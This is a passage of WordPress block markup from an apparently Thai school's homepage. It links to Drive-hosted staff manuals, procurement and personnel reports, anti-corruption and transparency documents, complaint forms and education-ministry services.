data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 